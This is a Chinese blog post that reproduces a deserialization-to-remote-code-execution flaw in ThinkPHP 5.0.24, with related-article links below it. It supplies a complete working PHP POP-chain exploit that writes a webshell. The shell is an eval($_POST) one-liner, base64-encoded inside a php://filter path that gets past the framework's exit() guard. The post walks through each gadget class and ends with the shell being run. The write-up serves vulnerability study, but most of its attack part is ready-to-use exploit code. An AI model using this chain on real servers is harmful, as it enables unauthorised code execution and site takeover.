Thinkphp 5.0.24反序列化漏洞导致RCE分析

已于 2022-03-30 18:30:06 修改
阅读量1w 收藏 12
点赞数 4
分类专栏: 漏洞复现 文章标签: web安全
于 2022-03-27 23:46:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263451/article/details/123784364
版权

1. 概述

总体思路就是先全局搜索可以利用的魔法函数作为入口,比如__destruct,然后再一步步构造pop链往漏洞触发点跳

根据大佬的指点漏洞触发点在thinkphp/library/think/console/Output.php的__call方法

public function __call($method, $args)
    {
        if (in_array($method, $this->styles)) {
            array_unshift($args, $method);
            return call_user_func_array([$this, 'block'], $args); ## 漏洞触发点,这里可以做为跳板,来触发漏洞
        }

        if ($this->handle && method_exists($this->handle, $method)) {
            return call_user_func_array([$this->handle, $method], $args);
        } else {
            throw new Exception('method not exists:' . __CLASS__ . '->' . $method);
        }
    }

2. 环境搭建

Windows、PHPStudy(PHP5.6.27)、ThinkPHP5.0.24;

ThinkPHP5.0.24 下载地址如下:

https://www.thinkphp.cn/download/1279.html

搭建好如下图所示:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UF87bEvk-1648394538253)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327115153591.png)]

先来写一个入口函数,将application\index\controller\Index.php修改为:

<?php
namespace app\index\controller;

class Index
{
    public function index()
    {
        if(isset($_GET['data'])){
            #echo base64_decode($_GET['data']);
            #echo '</br>';
            #echo 'aaa';
            $data = base64_decode($_GET['data']);
            unserialize($data);
        }else{
            highlight_file(__FILE__);
        }
        #return '<style type="text/css">*{ padding: 0; margin: 0; } .think_default_text{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> <h1>:)</h1><p> ThinkPHP V5<br/><span style="font-size:30px">十年磨一剑 - 为API开发设计的高性能框架</span></p><span style="font-size:22px;">[ V5.0 版本由 <a href="http://www.qiniu.com" target="qiniu">七牛云</a> 独家赞助发布 ]</span></div><script type="text/javascript" src="https://tajs.qq.com/stats?sId=9347272" charset="UTF-8"></script><script type="text/javascript" src="https://e.topthink.com/Public/static/client.js"></script><think id="ad_bd568ce7058a1091"></think>';
    }
}

至此环境就完全搭建好了。

3. POP链与POC

这里直接上大佬给的POP链图
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MERvS92s-1648394538254)(C:\Users\91136\Desktop\t01811445c8ddbe04a2.png)]
poc如下:

<?php

namespace think\process\pipes;
abstract class Pipes
{
}

use think\model\Pivot;

class Windows extends Pipes
{
    private $files = [];

    function __construct()
    {
        $this->files = [new Pivot()];
    }
}

namespace think;

abstract class Model
{
    protected $append = [];
    protected $error;
    protected $parent;
}

namespace think\model;

use think\Model;
use think\console\Output;
use think\model\relation\HasOne;

class Pivot extends Model
{
    public $parent;

    function __construct()
    {
        $this->append = ["getError" => "getError"];
        $this->parent = new Output();
        $this->error = new HasOne();
    }
}

namespace think\db;

use think\console\Output;

class Query
{
    protected $model;

    function __construct()
    {
        $this->model = new Output();
    }
}

namespace think\model;
abstract class Relation
{
    protected $selfRelation;
    protected $query;
}

namespace think\model\relation;

use think\model\Relation;

abstract class OneToOne extends Relation
{
    protected $bindAttr = [];
}

use think\db\Query;

class HasOne extends OneToOne
{
    function __construct()
    {
        $this->selfRelation = false;
        $this->query = new Query();
        $this->bindAttr = [1 => "file"];
    }
}

namespace think\console;

use  think\session\driver\Memcached;

class Output
{
    private $handle = null;
    protected $styles = [];

    function __construct()
    {
        $this->handle = new Memcached();
        $this->styles = ["getAttr"];
    }
}

namespace think\session\driver;

use think\cache\driver\File;

class Memcached
{
    protected $handler = null;
    protected $config = [];

    function __construct()
    {
        $this->handler = new File();
        $this->config = [
            'session_name' => '',
            'expire' => null,
        ];
    }
}


namespace think\cache\driver;
class File
{
    protected $options = [];
    protected $tag;

    function __construct()
    {
        $this->options = [
            'expire' => 0,
            'cache_subdir' => false,
            'prefix' => '',
            'path'=>'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
            'data_compress' => false,
        ];
        $this->tag = true;
    }

    public function get_filename()
    {
        $name = md5('tag_' . md5($this->tag));
        $filename = $this->options['path'];
        $pos = strpos($filename, "/../");
        $filename = urlencode(substr($filename, $pos + strlen("/../")));
        return $filename . $name . ".php";
    }
}


use think\process\pipes\Windows;

echo base64_encode(serialize(new Windows()));#payload

echo "\n";
$f = new File();
echo $f->get_filename();#获取shell的文件名

这里我自己也整理了一下poc画成了图的形式,方便理解
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L21NFXKM-1648394538254)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327120453349.png)]
整个的一个调用栈为

index.php:8, app\index\controller\Index->index()
Windows.php:59, think\process\pipes\Windows->__destruct()
Windows.php:163, think\process\pipes\Windows->removeFiles()
Windows.php:163, file_exists()
Model.php:2267, think\Model->__toString()
Model.php:936, think\Model->toJson()
Model.php:912, think\Model->toArray()
Output.php:212, think\console\Output->__call()
Model.php:912, think\console\Output->getAttr()
Output.php:212, call_user_func_array()
Output.php:124, think\console\Output->block()
Output.php:143, think\console\Output->writeln()
Output.php:154, think\console\Output->write()
Memcache.php:94, think\session\driver\Memcache->write()
File.php:160, think\cache\driver\File->set()
File.php:160, think\cache\driver\File->set()

4. 漏洞分析

起点是thinkphp/library/think/process/pipes/Windows.phpremoveFiles方法

    public function __destruct()
    {
        $this->close();
        $this->removeFiles();
    }

跟进removeFiles方法

    private function removeFiles()
    {
        foreach ($this->files as $filename) {
            #var_dump($filename);
            #die();
            if (file_exists($filename)) {
                @unlink($filename);
            }
        }
        $this->files = [];
    }

跳板:可以看到里面有个file_exists判断,$filename为$this->files所以我们可控,如果$filename为一个对象,那么就会触发这个对象的__tostring方法

全局搜索__tostring方法,这里我们选择model类的tostring方法
在这里插入图片描述
但是呢因为这里的model是一个抽象类,其意义在于被扩展,所以我们不能让$this->files=new model,全局搜索一下看谁继承了model类

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yh1NHqmH-1648394538255)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327123210734.png)]
可以看到一共有两个,随便选一个即可,这里我选择的是pivot类

所以$this->files=[new Pivot()]

因此从上面的file_exists,我们就跳到了model类的tostring方法

跟进tojson方法

model.php   
   public function toJson($options = JSON_UNESCAPED_UNICODE)
    {
        #echo '123';
        #die();
        return json_encode($this->toArray(), $options);
    }

跟进toarray方法

model.php       
    public function toArray()
    {
        $item    = [];
        $visible = [];
        $hidden  = [];

        $data = array_merge($this->data, $this->relation);

        // 过滤属性
        if (!empty($this->visible)) {
            $array = $this->parseAttr($this->visible, $visible);
            $data  = array_intersect_key($data, array_flip($array));
        } elseif (!empty($this->hidden)) {
            $array = $this->parseAttr($this->hidden, $hidden, false);
            $data  = array_diff_key($data, array_flip($array));
        }

        foreach ($data as $key => $val) {
            if ($val instanceof Model || $val instanceof ModelCollection) {
                // 关联模型对象
                $item[$key] = $this->subToArray($val, $visible, $hidden, $key);
            } elseif (is_array($val) && reset($val) instanceof Model) {
                // 关联模型数据集
                $arr = [];
                foreach ($val as $k => $value) {
                    $arr[$k] = $this->subToArray($value, $visible, $hidden, $key);
                }
                $item[$key] = $arr;
            } else {
                // 模型属性
                $item[$key] = $this->getAttr($key);
            }
        }
        // 追加属性(必须定义获取器)
        if (!empty($this->append)) {
            foreach ($this->append as $key => $name) {
                if (is_array($name)) {
                    // 追加关联对象属性
                    $relation   = $this->getAttr($key);
                    $item[$key] = $relation->append($name)->toArray();
                } elseif (strpos($name, '.')) {
                    list($key, $attr) = explode('.', $name);
                    // 追加关联对象属性
                    $relation   = $this->getAttr($key);
                    $item[$key] = $relation->append([$attr])->toArray();
                } else {
                    $relation = Loader::parseName($name, 1, false);
                    if (method_exists($this, $relation)) {
                        $modelRelation = $this->$relation();
                        $value         = $this->getRelationData($modelRelation);

                        if (method_exists($modelRelation, 'getBindAttr')) {
                            $bindAttr = $modelRelation->getBindAttr();
                            if ($bindAttr) {
                                foreach ($bindAttr as $key => $attr) {
                                    $key = is_numeric($key) ? $attr : $key;
                                    if (isset($this->data[$key])) {
                                        throw new Exception('bind attr has exists:' . $key);
                                    } else {
                                        $item[$key] = $value ? $value->getAttr($attr) : null;
                                    }
                                }
                                continue;
                            }
                        }
                        $item[$name] = $value;
                    } else {
                        $item[$name] = $this->getAttr($name);
                    }
                }
            }
        }
        return !empty($item) ? $item : [];
    }

进入到toarray方法后,现在就应该考虑如何调用漏洞触发点即如何调用Output.__call()

这块一共有三处可以调用__call方法,根据大佬提示,这里我们选择第三处
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l4I5OjhY-1648394538255)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327123805313.png)]
如果我们找这一处作为跳板的话,我们就得让$value=new output();并且代码要能顺利执行到这里来

可以看到我们要到912行,需要经过几个判断

判断处理
if (!empty($this->append))$this->append这个我们是可控的,所以只要让其非空即可
if (is_array($name))因为$name来自$this->append,所以也很好绕过,只要让$name不是数组即可
elseif (strpos($name, ‘.’))因为$name来自$this->append,所以也很好绕过,只要让$name不包含.即可
成功进入else分支

现在我们要进入if (method_exists($this, $relation))里面

因为$relation来自$name,这里的parseName函数可以等价看成$relation=$name,而$name我们又可控所以$relation可控,我们只需要让$relation为一个model类存在的方法即可,经过一番观察发现,model类的getError()函数其功能简单,且返回值$this->error可控,所以这里的$relation=‘getError’;

接下来就执行了geterror函数,因为其返回值可控所以$modelRelation可控

继续往下走,进入getRelationData函数
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kgGBY4dY-1648394538256)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327124957005.png)]
刚才我们就说过为了能跳到output的__call方法,我们就得让$value=new output();

所以现在目的就是进入if并且让$value=new output();,因为$this->parent可控,所以进入if后赋值很简单,那么现在问题就是怎么满足if判断

第一个是$this->parent不能为null,这个变量我们可控所以不用担心

第二个是!$modelRelation->isSelfRelation(),得让其返回值不为空:

$modelRelation我们可控,所以得找一个包含有这个方法的类并且返回值不为空,可以看到Relation类有这个方法,但是这是一个抽象类,不能实例化,所以要找其子类

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mIXaPGmR-1648394538256)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327205434416.png)]
第三个是get_class($modelRelation->getModel()) == get_class($this->parent),我们知道$this->parent要为output类,所以$modelRelation->getModel()也要返回为output类,其次我们也要要求$modelRelation必须要有getModel()方法,查找一下发现Relation这个类也有getModel()方法

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mvluUifW-1648394538256)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327210152621.png)]
所以这里总结下来就是:$modelRelation必须包含getModel()和isSelfRelation()方法,且$modelRelation必须为Relation的子类

所以$modelRelation就从下面这几个选吧

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HTwPOKgV-1648394538257)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327210514093.png)]
这里大概定了一下$modelRelation的范围,继续往下看

回到model.phpde 904行
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pP6kV2Wl-1648394538257)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327210653474.png)]
可以看到$modelRelation需要有getBindAttr方法,继续全局搜索一下,发现onetoone这个类有这个方法,并且这个类也是onetoone的子类,ok那么我们就让$modelRelation为这个类

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-omBxzy1U-1648394538257)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327211045741.png)]
但是!这还是一个抽象类,不能进行实例化,所以我们得选择他的子类,一共有两个,选择哪个都无所谓,只是构造poc时有所不同罢了,这里我选择hasone类

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gPEqz7My-1648394538258)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327211335072.png)]
所以$this->error=$modelRelation=new hasone()

# 梳理一下$modelRelation
$modelRelation=new hasone()继承onetoone继承relation

现在确定了$modelRelation再回去看看那个getRelationData函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VJUbAArC-1648394538258)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327124957005.png)]
$this->parent 我们可控,这里为了让$value为output对象,所以让$this->parent=new output()

!hasone->isSelfRelation(),跟进isSelfRelation(),这里的$this->selfRelation我们可控,令其为false,可以使!$modelRelation->isSelfRelation()判断为真

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZQ4sQc8s-1648394538258)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327212049549.png)]
get_class($modelRelation->getModel()) == get_class($this->parent))

跟进hasone->getModel(),这里的$this->query我们可控

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m3LGuxlY-1648394538258)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327212345791.png)]
全局搜索一下getModel(),发现query类的getmodel很好用,我们只需要让$this->query=new query,并且query类的$this->model为new output()即可
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wqJUeWdT-1648394538259)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327212523497.png)]
这样$modelRelation->getModel()的返回值就是output对象,又因为$this->parent为output对象,所以可使get_class($modelRelation->getModel()) == get_class($this->parent))判断为真

这样我们就进入了if里面并且让$value=new output();

然后return $value;

返回到model.php的904行
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qgDR5rpE-1648394538259)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327213045504.png)]
hasone类存在getBindAttr方法所以进入if

进入$bindAttr = $modelRelation->getBindAttr();

跟进看一下,非常简单,$this->bindAttr我们可控,可以让$bindAttr为我们任何想要的对象
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jLydR1bD-1648394538259)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327213330916.png)]
继续往下走,从906到907行我们可以看出来我们得让$this->bindAttr必须为一个非空的数组

然后到909行,这里的$this->data我们可控,直接让其为空,就可以到912行,终于到了我们想要的点!!!

这里的参数$attr是根据$bindAttr来的,而$bindAttr我们可控,所以$attr可控,这里的$attr取什么值都无所谓,重要的是$value=output(),因为output类没有getAttr方法,所以就可以触发output类的call方法了

跟进到output类的call方法
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0EhLYy2E-1648394538259)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327214450120.png)]
从最开始可知,我们要进入的是212行的漏洞触发点,所以要先满足if判断

首先$method为"getAttr",而$this->styles我们可控,就让其等于[“getAttr”]即可进入if

进入后首先给$args数组插了一个值$method,这里无所谓,我们并不需要$args

接着往下走,调用block函数,跟进,可以看到调用了writeln方法,这里的参数是啥都无所谓,因为我们的payload不在这里
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XCqHSSH3-1648394538260)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327214954040.png)]
跟进,注意这里的第二个参数为true
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HmGPFmH5-1648394538260)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327215159152.png)]
继续跟进,这里的$this->handle我们可控,所以得找一个类作为跳板了,注意这里的$newline为true
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HII3plq0-1648394538260)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327215259277.png)]
全局搜索write函数,经过大佬指点,这里我们可以选择Memcached 类的write方法,所以令$this->handle=new Memcached ()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fw2ttw9n-1648394538260)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327215459868.png)]
那就继续跟进,Memcached 类的$this->handler依然可控,因为think\cache\driver\File中的set() 方法可以写文件,所以我们这里的$this->handler=new file()
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9nFAqcbf-1648394538260)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327215641587.png)]
这样就调用了file类的set方法,注意这里的$sessData传参过来为true

跟进set方法
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jxQ02OCA-1648394538261)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327220044993.png)]
注意这里因为传参进来时$value=true,这就不能让我们写进去webshell了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-x40M6K54-1648394538261)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327220251787.png)]
但是确实第一次我们无法写入,我们继续往下走可以看到一个setTagItem方法,参数为$filename,跟进

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1yt8qVtE-1648394538261)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327220433277.png)]
我们可以看到在198行,$filename的值被赋给了$value,然后又调用了一次set方法,这时候文件名成了文件内容,所以说只要我们文件名构造的得当我们就能写入webshell

而$filename为getCacheKey产生的

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YpWi3XIO-1648394538261)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327220729856.png)]
跟进看看,这里的$this->options[‘cache_subdir’],$this->options[‘prefix’]我们可控,所以很容易就不走这些分支。所以总的来说即首先给$name进行了MD5,然后在80行给其添加了一个前缀$this->options[‘path’](这个我们可控)和一个后缀.php,最后return $filename

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-95g7Ftfn-1648394538261)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327220746107.png)]
分析:$name我们可控但是会经过md5处理,所以不能写我们的payload,所以我们的payload就写在这个$this->options[‘path’]

返回之后继续往下走,可以看到

$data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;

我们得绕过exit,因为就算我们写入了shell,但是执行到exit就结束了,并不会执行后面的shell代码

另外还有一点就是windows下写文件时文件名不能包含?、<这些字符,也就要求我们$filename里面不能包含?、<这些字符

本来我们的$this->options['path']='php://filter/write=string.rot13/resource=./<?cuc @riny($_TRG[_]);?>',但是很遗憾在windows下因为文件名包含了特殊字符所以这个payload不起作用

这里根据大佬的解答,我知道了payload应该这么写,我的理解是windows下写不能用rot13编码绕过exit,应该用base64编码绕过,但是由于伪协议中存在resource=所以会使的base64解码失败(base64编码的数据=号只会出现在最后,不会出现在中间),所以应该找一个解码器配合其使用所以找到了convert.iconv.utf-8.utf-7,这个首先把=变为+AD0-,然后这个刚好可以被base64解码这就使得解码时不会报错,我们的shell最终也就被成功的解码出来(注:这里的PD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g解码出来就是一句话木马)

$this->options['path']='php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php'

附上链接:https://xz.aliyun.com/t/7457

好了,回到刚才

如此,在第一次进入set时,

$filename = php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWycxJ10pOz8+/…/a.phpc9a7cef7c410e3ea21c4287f392fd663.php

$data = <?php
//000000000000
exit();?>
b:1;

这时候会写入文件名为a.phpc9a7cef7c410e3ea21c4287f392fd663.php,内容为$data的文件

然后在161行进入setTagItem函数,参数$filename=php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWycxJ10pOz8+/…/a.phpc9a7cef7c410e3ea21c4287f392fd663.php
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mKVOSkMV-1648394538262)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327224118707.png)]
经过一些列处理,到198行时

$value = $name = php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWycxJ10pOz8+/…/a.phpc9a7cef7c410e3ea21c4287f392fd663.php

$key = ‘tag_’ . md5($this->tag);

然后再执行一次set函数
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-umMXCx1p-1648394538262)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327224437072.png)]
经过getcachekey函数后

$filename为$this->options[‘path’].md5(‘tag_’ . md5($this->tag)).’.php’即php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWycxJ10pOz8+/…/a.php3b58a9545013e88c7186db11bb158c44.php

$data为<?php
//000000000000
exit();?>
s:154:“php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWycxJ10pOz8+/…/a.phpc9a7cef7c410e3ea21c4287f392fd663.php”;

然后file_put_contents,在文件名是伪协议的帮助下,对内容$data首先convert.iconv.utf-8.utf-7解码然后convert.base64-decode解码并输出到文件中,文件名为a.php3b58a9545013e88c7186db11bb158c44.php
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CiqjxiUY-1648394538262)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327224829587.png)]
shell文件就在网站根目录下,打开看下,发现写入shell成功
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-E5hcXgzK-1648394538262)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327224902648.png)]
来个phpinfo
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4bxaegrA-1648394538262)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220327225115591.png)]

5. 总结

这条链分析下来感觉收获很多也感觉很有意思,后面我还会继续分析thinkphp其他的反序列化,这次大概有几个要点梳理一下

  1. file_exits作为入口点跳到model的tostring
  2. Model类的__toString调用Output类的__call的条件
  3. 二次调用set实现内容可控
  4. 用过滤器绕过exit()
  5. windows下文件名不能包含<、?特殊字符导致某些payload用不了
  6. windwos下写文件的方法

6. 参考链接

附上各位大佬的链接:

https://www.anquanke.com/post/id/265088

https://www.anquanke.com/post/id/196364#h2-4

https://xz.aliyun.com/t/7457

https://blog.csdn.net/rfrder/article/details/114644844

https://xz.aliyun.com/t/10364

https://github.com/rama291041610/Thinkphp5.0.24-Unserialize-Vulnerability

浔阳江头夜送客丶
关注
  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ThinkPHP 小于 5.0.24 远程代码执行高危漏洞 修复方案
易天海
06-09 1713
https://yq.aliyun.com/articles/686397
ThinkPHP 漏洞利用工具
05-18 3410
在Github上搜寻好用的安全工具,来充实武器库,实属一大乐趣所在。当看到ThinkPHP十年磨一剑的提示,那么今天这里分享的工具就可以派上用场了,一键检测ThinkPHP全版本漏洞。01、TPscan一键ThinkPHP漏洞检测,基于Python3,命令行检测,集成了14个常见的ThinkPHP框架漏洞检测插件。github项目地址:https://github.com...
ThinkPHP5.0.x远程执行漏洞分析与复现
最新发布
qq_74148743的博客
05-11 820
2018年12月10日,ThinkPHPv5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。此次漏洞ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程的代码执行,进而获得服务器权限。
Thinkphp5.0.24 反序列化rce链学习
feng的博客
10-25 1792
Thinkphp5.0.24 反序列化rce链学习 这个链子是出现在9月份的0CTF中,一直没来得及学习,今天晚上抽出时间来看一下这个链子。 之前的5.0.x版本的反序列化链是写文件getshell,需要有一个可写的目录才行,而这条新链子不需要写文件,直接可以rce分析 整个链子的前部分后后部分都是老套路了,只是中间的部分稍微改了一下。 链子的前部分和老链子一模一样:https://blog.csdn.net/rfrder/article/details/114644844、 在运行到thinkphp/
Thinkphp 5.0.24变量覆盖漏洞导致RCE分析
weixin_43263451的博客
03-30 1万+
大概思路就是我们可以修改requests类的filter属性、method属性以及get属性的值,从而在调用param方法时,call_user_func_array的值我们就可以控制,造成了远程代码执行漏洞。 0. 大致流程 经过入口文件进入run函数 首先在116行根据url获取调度信息时,触发变量覆盖漏洞从而修改requests对象的属性值,然后获取?s=captcha的调度信息并返回给$dispatch 再到139行进入exec函数并将$dispatch作为参数带入 跟进后根据$dispatch
Thinkphp5.0.x_RCE复现&5.0.24反序列化大礼包
大博的博客
08-07 6276
环境部署 以TP5.0.22为例 + PHP 5.6.27-NTS + phpstorm2020.1 反序列化环境为:TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 漏洞成因 现在TP的RCE通常将其分成两类: Request类其中变量被覆盖导致RCE 路由控制不严谨导致可以调用任意类致使RCE 反序列化的应用(需要存在反序列化的地方) Request类其中变量被覆盖导致RCE 我们以这个POC为例,进行复现: 我们正常的代码逻辑已经简单的写在了前文,如有代码执行疑
thinkphp v5.0.24 密码爆破_实战技巧|利用ThinkPHP5.X的BUG实现数据库信息泄露
weixin_39913472的博客
11-25 7184
文章来源:NearSec记录一下渗透过程中的思路以及遇到的难点,不足之处还请各位大佬多多包涵。拿到目标站点:http://**.****.cn首先针对目标进行子域名收集发现存在http://t**.****.cn域名,为测试系统URL后面随便输入个目录,发现是ThinkPHP 3.2.3的系统,目前公开渠道没有可直接GetShell的漏洞尝试加上/admin可以进入到后台登录页,使用Burp挂载弱...
ThinkPHP漏洞大全
热门推荐
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
thinkphp远程代码执行exp
07-29
thinkphp的远程代码执行漏洞的exp,版本通用,带检查,上传等功能。
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
ThinkPHP 5.0.24 核心版
11-05
2. 企业级应用:在大型企业项目中,ThinkPHP 5.0.24的模块化设计、强大的权限管理以及优秀的性能优化能力,使其成为理想的后台开发框架。 3. API开发:通过灵活的路由和数据操作API,ThinkPHP 5.0.24可以轻松构建...
ThinkPHP3.2.3反序列化链子分析.doc
07-08
ThinkPHP3.2.3反序列化链子分析》 这篇文章主要探讨了ThinkPHP3.2.3框架中的一个安全问题——反序列化漏洞。由于该版本已不再维护,本文旨在重现和理解这个特定版本中的反序列化链子,以便于安全研究和教育。 反...
thinkPhp5.0.24框架
02-23
- **应用目录结构**:ThinkPhp5.0.24的目录结构更加模块化,包括app、config、public、runtime等,每个部分都有明确的职责,方便开发者进行模块化开发。 - **配置文件**:配置文件位于config目录下,可以进行全局...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
thinkphp5.0.24反序列化链子分析
m0_62422842的博客
07-19 1506
thinkphp5.0.24框架反序列化的两种链子思路分析
thinkphp5.0.24反序列化
qq_62989306的博客
09-18 1952
此时我们需要寻找能写webshell的__call()方法,在这里选择的是think\console\Output类里的$method是getAttr,且$this->styles是可控的。只要在styles数组里加一个getAttr即可。所以可以顺利进入第一个if。array_unshift() 函数用于向数组插入新元素,新数组的值将被插入到数组的开头。里的参数都是可控的,所以往下走没有影响。call_user_func_array()是回调函数,可以将把一个数组参数作为回调函数的参数。
thinkphp5.0.24漏洞利用工具
06-28
